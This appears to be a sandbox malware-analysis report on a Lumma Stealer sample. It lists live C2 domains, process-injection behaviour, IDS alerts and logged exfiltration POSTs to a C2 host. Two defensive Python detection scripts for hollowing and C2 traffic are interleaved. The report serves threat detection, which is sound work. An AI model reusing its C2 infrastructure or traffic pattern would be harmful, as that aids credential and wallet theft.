Windows Analysis Report
PI1EA8P74K.exe

Overview

General Information

Sample name: PI1EA8P74K.exe (renamed because the original name is a hash value)
Original sample name: 4de5ddc2a970f98efe99dc22c5b2de78.exe
Analysis ID: 1582432
MD5: 4de5ddc2a970f98efe99dc22c5b2de78
SHA1: 2dec8ea0a05c5284f0db5573b3608b64bf94375d
SHA256: d24037cf570f9b0aa4337a9397eca861d2d3b0891b18a924c9ae6ad466a95de4
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • PI1EA8P74K.exe (PID: 7952 cmdline: "C:\Users\user\Desktop\PI1EA8P74K.exe" MD5: 4DE5DDC2A970F98EFE99DC22C5B2DE78)
    • dxdiag.exe (PID: 8016 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
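The process tree and the injection-related signatures above (child created suspended, memory allocated and written in a foreign process, a PE injected into dxdiag.exe) describe the hollowing sequence a host-side detection should key on. The following Python is an added example for this report, not Joe Sandbox code and not derived from the sample: it correlates constructed Sysmon-style records (field names follow Sysmon event IDs 1 ProcessCreate, 10 ProcessAccess and 8 CreateRemoteThread) into one injection alert. PIDs 7952 and 8016 and the two image paths come from the report; the explorer.exe parent, the scanner PID, the access masks and the hollowing-host list beyond dxdiag.exe are assumptions. A dxdiag.exe started normally and a read-only scanner handle are included as noise and must not fire.

```python
"""Correlate process-creation and cross-process access events into a
process-injection alert.

Added example for this report; not Joe Sandbox code and not the sample's own
code. The records below are constructed to mirror the behaviour the report
attributes to PI1EA8P74K.exe (PID 7952) and dxdiag.exe (PID 8016); field
names follow Sysmon event IDs 1 (ProcessCreate), 10 (ProcessAccess) and
8 (CreateRemoteThread). Everything not in the report (explorer.exe as the
sample's parent, the scanner PID, the access masks) is assumed.
"""
from collections import defaultdict

# Documented Win32 process access rights.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_ALL_ACCESS = 0x1FFFFF
# A parent that allocates (VM_OPERATION) and writes (VM_WRITE) in its child is
# doing what the "Allocates memory in foreign processes" and "Writes to
# foreign memory regions" signatures describe.
WRITE_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Hollowing hosts to match. dxdiag.exe is from this report; the others are an
# assumption for the example and should be tuned to the environment.
HOLLOW_HOSTS = {"dxdiag.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe"}

EVENTS = [  # constructed records, not sandbox output
    {"eid": 1, "pid": 7952, "image": r"C:\Users\user\Desktop\PI1EA8P74K.exe",
     "ppid": 4120, "parent_image": r"C:\Windows\explorer.exe"},
    {"eid": 1, "pid": 8016, "image": r"C:\Windows\SysWOW64\dxdiag.exe",
     "ppid": 7952, "parent_image": r"C:\Users\user\Desktop\PI1EA8P74K.exe"},
    {"eid": 10, "source_pid": 7952, "target_pid": 8016,
     "granted_access": PROCESS_ALL_ACCESS},
    {"eid": 8, "source_pid": 7952, "target_pid": 8016, "start_address": 0x400000},
    # Noise: dxdiag.exe started normally from explorer.exe, never written to.
    {"eid": 1, "pid": 9000, "image": r"C:\Windows\System32\dxdiag.exe",
     "ppid": 4120, "parent_image": r"C:\Windows\explorer.exe"},
    # Noise: a scanner opens the sample with read/query rights only.
    {"eid": 10, "source_pid": 6000, "target_pid": 7952,
     "granted_access": PROCESS_QUERY_INFORMATION | PROCESS_VM_READ},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def in_windows_dir(path):
    return path.lower().startswith("c:\\windows\\")


def find_injections(events):
    """Return one alert per parent->child pair where the parent obtained
    allocate+write access to a child that is a known hollowing host."""
    procs = {e["pid"]: e for e in events if e["eid"] == 1}
    granted = defaultdict(int)        # (source, target) -> OR of granted masks
    remote_threads = set()
    for e in events:
        if e["eid"] == 10:
            granted[(e["source_pid"], e["target_pid"])] |= e["granted_access"]
        elif e["eid"] == 8:
            remote_threads.add((e["source_pid"], e["target_pid"]))

    alerts = []
    for (src, dst), mask in granted.items():
        child = procs.get(dst)
        if child is None or child["ppid"] != src:
            continue                   # only the creating parent is in scope
        if (mask & WRITE_MASK) != WRITE_MASK:
            continue                   # read/query-only handles are fine
        if basename(child["image"]) not in HOLLOW_HOSTS:
            continue
        parent = procs.get(src)
        parent_image = parent["image"] if parent else child["parent_image"]
        thread = (src, dst) in remote_threads
        alerts.append({
            "source_pid": src, "source_image": parent_image,
            "target_pid": dst, "target_image": child["image"],
            "granted_access": hex(mask), "remote_thread": thread,
            # Writing into a system binary from outside C:\Windows and then
            # starting a thread in it is the complete hollowing pattern.
            "severity": "high" if thread and not in_windows_dir(parent_image) else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_injections(EVENTS):
        print(alert)
```

Sysmon does not record the CREATE_SUSPENDED flag, so the suspended start the sandbox observed is not a field here; the combination of parent-created child, allocate+write access and a remote thread is what survives into telemetry. Tune HOLLOW_HOSTS and the parent-path test to your estate before deploying.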
Malware family
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration
{"C2 url": ["shapestickyr.lat", "curverpluch.lat", "marbleshinys.click", "talkynicer.lat", "bashfulacid.lat", "wordyfindy.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat"], "Build id": "ZqchOa--new"}
Yara matches (network capture)
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Yara matches (memory dumps)
Source | Rule | Description | Author
00000002.00000003.1571272583.0000000003020000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000003.1567861669.0000000003020000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000003.1570587188.0000000003020000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000003.1569901131.0000000003020000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(41 further entries not shown)

Sigma
No Sigma rule has matched
Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T15:55:16.951297+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49756 | 172.67.148.118 | 443 | TCP
2024-12-30T15:55:29.522357+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49837 | 172.67.148.118 | 443 | TCP
2024-12-30T15:55:31.034523+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49845 | 172.67.148.118 | 443 | TCP
2024-12-30T15:55:32.407597+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49858 | 172.67.148.118 | 443 | TCP
2024-12-30T15:55:33.807369+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 49869 | 172.67.148.118 | 443 | TCP
2024-12-30T15:55:36.886737+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64243 | 172.67.148.118 | 443 | TCP
2024-12-30T15:55:38.672375+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64254 | 172.67.148.118 | 443 | TCP
2024-12-30T15:55:41.123431+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64270 | 172.67.148.118 | 443 | TCP

2024-12-30T15:55:29.028116+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 49756 | 172.67.148.118 | 443 | TCP
2024-12-30T15:55:30.029059+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 49837 | 172.67.148.118 | 443 | TCP
2024-12-30T15:55:41.627242+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 64270 | 172.67.148.118 | 443 | TCP

2024-12-30T15:55:29.028116+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 49756 | 172.67.148.118 | 443 | TCP

2024-12-30T15:55:30.029059+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.11 | 49837 | 172.67.148.118 | 443 | TCP

2024-12-30T15:55:32.941576+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49858 | 172.67.148.118 | 443 | TCP

                AV Detection

Source: 00000000.00000002.1386100200.000001D1BBF31000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["shapestickyr.lat", "curverpluch.lat", "marbleshinys.click", "talkynicer.lat", "bashfulacid.lat", "wordyfindy.lat", "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat"], "Build id": "ZqchOa--new"}
Source: PI1EA8P74K.exe | ReversingLabs: Detection: 86%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: PI1EA8P74K.exe | Joe Sandbox ML: detected
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: bashfulacid.lat
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: tentabatte.lat
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: curverpluch.lat
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: talkynicer.lat
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: shapestickyr.lat
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: manyrestro.lat
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: slipperyloo.lat
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: wordyfindy.lat
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: marbleshinys.click
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000002.00000002.1642797445.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: ZqchOa--new
Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49837 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49845 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49858 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:49869 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64243 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64254 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.148.118:443 -> 192.168.2.11:64270 version: TLS 1.2
Source: PI1EA8P74K.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

                Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49837 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49837 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:64270 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49858 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49756 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49756 -> 172.67.148.118:443
Source: Malware configuration extractor | URLs: shapestickyr.lat
Source: Malware configuration extractor | URLs: curverpluch.lat
Source: Malware configuration extractor | URLs: marbleshinys.click
Source: Malware configuration extractor | URLs: talkynicer.lat
Source: Malware configuration extractor | URLs: bashfulacid.lat
Source: Malware configuration extractor | URLs: wordyfindy.lat
Source: Malware configuration extractor | URLs: tentabatte.lat
Source: Malware configuration extractor | URLs: manyrestro.lat
Source: Malware configuration extractor | URLs: slipperyloo.lat
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49756 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49837 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49845 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49869 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49858 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64243 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64254 -> 172.67.148.118:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64270 -> 172.67.148.118:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: marbleshinys.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 45 | Host: marbleshinys.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ET1RU0B9LQR8S4C3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12833 | Host: marbleshinys.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=NZUOHX8B8FU | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15015 | Host: marbleshinys.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=5YX4CKCOBDQTSL5T | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20414 | Host: marbleshinys.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=21MX5AWY95P | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1174 | Host: marbleshinys.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=HBJCJS19A2ZIMW | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 586319 | Host: marbleshinys.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 80 | Host: marbleshinys.click
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: marbleshinys.click
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: marbleshinys.click
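The HTTP lines above show the exchange the Suricata rules fired on: repeated POST /api requests to marbleshinys.click under a stock Chrome 119 User-Agent, an eight-byte form-urlencoded body first, then multipart/form-data uploads of 12 KB to 586 KB, all from the one JA3 fingerprint. The following Python is an added example, not Joe Sandbox code and not the sample's code: it runs two checks over a constructed tab-separated proxy log (the log format is an assumption; adapt the parser to your proxy) using the report's own C2 domain list and JA3 hash as hard indicators, plus a behavioural rule for a tiny check-in followed by large multipart uploads to the same host, which still fires when the operator rotates domains. The hosts www.example.com and upload.example.org, their JA3 value and the size thresholds are constructed for the example.

```python
"""Flag the Lumma-style C2 exchange from this report in a web-proxy log.

Added example (not Joe Sandbox code, not the sample's code). Indicators come
from the report's malware configuration and JA3 output; the log lines, the
log format and the thresholds are constructed for the example.
"""
from collections import defaultdict

# Indicators copied from the report: C2 domains from the extracted config,
# JA3 from the Joe Sandbox View / Suricata JA3 hits.
C2_HOSTS = {
    "shapestickyr.lat", "curverpluch.lat", "marbleshinys.click",
    "talkynicer.lat", "bashfulacid.lat", "wordyfindy.lat",
    "tentabatte.lat", "manyrestro.lat", "slipperyloo.lat",
}
C2_JA3 = {"a0e9f5d64349fb13191bc781f81f42e1"}

# Thresholds for the behavioural rule (assumptions for this example): a
# check-in body at most this small, then multipart uploads at least this large.
CHECKIN_MAX_BYTES = 16
UPLOAD_MIN_BYTES = 10_000

# Constructed proxy log, tab-separated:
# timestamp  client  host  method  path  content-type  content-length  ja3
# Rows 1-5 mirror the report's POSTs to marbleshinys.click; rows 6-7 are
# constructed benign traffic (example.com / example.org, made-up JA3).
LOG = """\
2024-12-30T15:55:29Z\t192.168.2.11\tmarbleshinys.click\tPOST\t/api\tapplication/x-www-form-urlencoded\t8\ta0e9f5d64349fb13191bc781f81f42e1
2024-12-30T15:55:30Z\t192.168.2.11\tmarbleshinys.click\tPOST\t/api\tapplication/x-www-form-urlencoded\t45\ta0e9f5d64349fb13191bc781f81f42e1
2024-12-30T15:55:31Z\t192.168.2.11\tmarbleshinys.click\tPOST\t/api\tmultipart/form-data; boundary=ET1RU0B9LQR8S4C3\t12833\ta0e9f5d64349fb13191bc781f81f42e1
2024-12-30T15:55:33Z\t192.168.2.11\tmarbleshinys.click\tPOST\t/api\tmultipart/form-data; boundary=HBJCJS19A2ZIMW\t586319\ta0e9f5d64349fb13191bc781f81f42e1
2024-12-30T15:55:40Z\t192.168.2.11\tmarbleshinys.click\tPOST\t/api\tapplication/x-www-form-urlencoded\t80\ta0e9f5d64349fb13191bc781f81f42e1
2024-12-30T15:56:02Z\t192.168.2.12\twww.example.com\tPOST\t/api\tapplication/json\t120\t579ccef312d18482fc42e2b822ca2430
2024-12-30T15:56:05Z\t192.168.2.12\tupload.example.org\tPOST\t/api\tmultipart/form-data; boundary=abc\t300000\t579ccef312d18482fc42e2b822ca2430
"""


def parse(log):
    """Turn the tab-separated log into dicts; Content-Length becomes an int."""
    rows = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, host, method, path, ctype, length, ja3 = line.split("\t")
        rows.append({"ts": ts, "src": src, "host": host, "method": method,
                     "path": path, "ctype": ctype, "length": int(length),
                     "ja3": ja3})
    return rows


def detect(rows):
    alerts = []
    # Rule 1: hard indicators from the report. JA3 is only reported when the
    # host did not already match, so each request yields at most one hit.
    for r in rows:
        if r["host"] in C2_HOSTS:
            alerts.append({"kind": "known C2 host", "ts": r["ts"],
                           "src": r["src"], "detail": r["host"]})
        elif r["ja3"] in C2_JA3:
            alerts.append({"kind": "C2-associated JA3", "ts": r["ts"],
                           "src": r["src"], "detail": r["ja3"]})

    # Rule 2: behaviour, independent of the domain. Group POST /api requests
    # per (client, host) and look for a tiny form-urlencoded check-in followed
    # by large multipart/form-data uploads, the shape of the exchange above.
    flows = defaultdict(list)
    for r in rows:
        if r["method"] == "POST" and r["path"] == "/api":
            flows[(r["src"], r["host"])].append(r)
    for (src, host), reqs in flows.items():
        reqs.sort(key=lambda r: r["ts"])
        checkins = [r for r in reqs
                    if r["ctype"].startswith("application/x-www-form-urlencoded")
                    and r["length"] <= CHECKIN_MAX_BYTES]
        uploads = [r for r in reqs
                   if r["ctype"].startswith("multipart/form-data")
                   and r["length"] >= UPLOAD_MIN_BYTES]
        if checkins and uploads and checkins[0]["ts"] < uploads[0]["ts"]:
            alerts.append({"kind": "check-in then exfiltration",
                           "ts": checkins[0]["ts"], "src": src, "detail": host,
                           "uploads": len(uploads),
                           "bytes": sum(r["length"] for r in uploads)})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(LOG)):
        print(alert)
```

The User-Agent is deliberately not an indicator: the report notes the sample uses a known browser user agent, so it matches legitimate Chrome traffic, whereas the JA3 hash reflects the TLS stack the stealer itself links. Rule 2 is the one worth keeping once the nine domains above are burned.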
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: dxdiag.exe, 00000002.00000002.1643357377.0000000003031000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1571272583.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1567861669.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1570587188.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1570198116.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1569901131.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1638321610.0000000003022000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566987811.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1576883133.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1578784333.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1583499340.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566093282.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1569019682.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566706853.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1567162517.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1565979094.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1578277745.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1568656377.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1566813341.0000000003020000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1603744943.000000000301F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: dxdiag.exe, 00000002.00000003.1523032257.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1523194376.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft(4
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: dxdiag.exe, 00000002.00000003.1553682923.000000000543E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: dxdiag.exe, 00000002.00000003.1525898591.0000000005469000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.1526103490.0000000005467000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: dxdiag.exe, 00000002.00000003.1555074490.000000000542A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
